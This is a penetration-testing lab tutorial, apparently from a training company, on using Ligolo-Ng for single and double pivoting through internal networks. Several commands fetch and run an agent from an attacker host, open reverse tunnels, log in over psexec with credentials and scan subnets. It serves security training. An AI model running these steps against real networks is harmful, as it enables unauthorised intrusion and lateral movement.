Page 1 of 16
Contents
Ligolo-Ng Overview: ....................................................................... 3
Ligolo V/S Chisel: ........................................................................... 3
Lab Setup ....................................................................................... 3
Prerequisites .................................................................................. 3
Setting up Ligolo-Ng ....................................................................... 4
Single Pivoting ............................................................................... 9
Double Pivoting ........................................................................... 11
Page 2 of 16
�Ligolo-Ng Overview:
Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish
tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features
include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool
supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS
Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance
time by avoiding tool residue on disk or in memory.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Ligolo V/S Chisel:
• Ligolo-Ng outperforms Chisel in terms of speed and customization options.
• Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections
with each target.
• Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
• Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which
operates primarily on HTTP using a websocket.
Lab Setup
Follow the step-by-step guide for lateral movement within a network, covering both single and double
pivoting techniques.
Prerequisites
Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file for Linux 64-bit.
Install the 'agent' file on the target machine and the 'proxy' file on the attacking machine (Kali Linux).
Page 3 of 16
�Setting up Ligolo-Ng
Step1: Following the acquisition of both the agent and proxy files, the next step involves the setup of
Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the 'ifconfig' command is
employed. To initiate activation, execute the prescribed sequence of commands as follows:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify Ligolo-Ng activation with: ‘ifconfig’ command
Page 4 of 16
�Step2: Unzip the Ligolo proxy file:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute
subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the
'help' command
./proxy -h
Page 5 of 16
�Step 3: The options displayed in the preceding image are designed for incorporating various types of
certificates with the proxy. The chosen approach involves utilizing the '-selfcert' option, which
operates on port 11601. Execute the provided command, as illustrated in the accompanying image
below:
./proxy -selfcert
Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking
machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file
using the command:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
Page 6 of 16
�To facilitate the transmission of this agent file to the target, establish a server with the command:
updog -p 80
Step 5: In the context of lateral movement, a session has been successfully acquired through netcat.
Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file
onto the target system. Referencing the image below, execute the provided sequence of commands:
cd Desktop
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is
presently operational on Kali, the subsequent action involves executing the agent file.
Page 7 of 16
�./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the
'session' command, opting for '1' to access the active session. Following the session establishment,
execute the 'ifconfig' command as illustrated in the provided image.
Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address
192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this
internal network in the subsequent steps.
Page 8 of 16
�Single Pivoting
In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of
Network A.
Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due
to different network configuration.
To progress towards the single pivoting objective, a new terminal window will be opened.
Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as
illustrated in the image below, utilizing the following commands:
ip route add 192.168.148.0/24 dev ligolo
ip route list
Page 9 of 16
�Return to the Ligolo proxy session window and initiate the tunneling process by entering the 'start'
command, as demonstrated in the provided image.
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B
subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.
Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the
previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as
illustrated in the image below.
Page 10 of 16
�Double Pivoting
In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing
Network B as an intermediary.
From the newly opened terminal window, utilize the Impacket tool to access the identified Windows
10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download
the Ligolo agent onto Windows 10
Impacket-psexec administrator:123@192.168.148.132
cd c:\users\public
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Page 11 of 16
�Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established,
given that our Ligolo proxy file is already operational.
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Examine Ligo-ng proxy server, a new session, corresponding to Windows 10, will be present, as
indicated in the accompanying image. Execute the 'start' command to initiate additional tunneling.
Page 12 of 16
�Execute the 'session' command to display the list of sessions. Navigate through the sessions using
arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest
session, identified as session 2. Select this session and utilize the 'ifconfig' command to inspect the
interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24,
mirroring the details depicted in the image below.
Page 13 of 16
�Upon identifying the new network, the initial step involves attempting a ping. However, the image
below indicates an absence of connectivity between Kali and the network C.
Add the Network C Subnet in the IP route list with the following command.
ip route add 192.168.159.0/24 dev ligolo
ip route list
With the modification of our IP route, the next step involves the addition of a listener to traverse the
intra-network and retrieve the session. To incorporate the listener, utilize the following command:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The image above confirms the activation of the listener. To initiate tunneling, refer to available options
using the help command. It becomes evident that halting the ongoing tunneling in session 1 is
necessary before starting the process in session 2. This step-by-step approach facilitates the transfer
of data to the listener, which subsequently retrieves the necessary information. This operational
technique, known as double pivoting, involves stopping the initial tunneling in the first session using
the 'stop' command. In second session, execute the 'start' command, following the steps illustrated
in the image below.
Page 14 of 16
�Executing double pivoting was successful, and its verification occurred through the utilization of
crackmapexec with the command:
crackmapexec smb 192.168.159.0/24
Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and
nmap scan, leveraging the acquired network access, as illustrated in the image below:
Page 15 of 16
�Page 16 of 16
� JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Bug Bounty Network Security
Ethical Hacking Essentials
Network Pentest
Wireless Pentest
ADVANCED
Burp Suite Pro Web Pro Computer
Services-API Infrastructure VAPT Forensics
Advanced CTF
Android Pentest Metasploit
EXPERT
Red Team Operation
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in
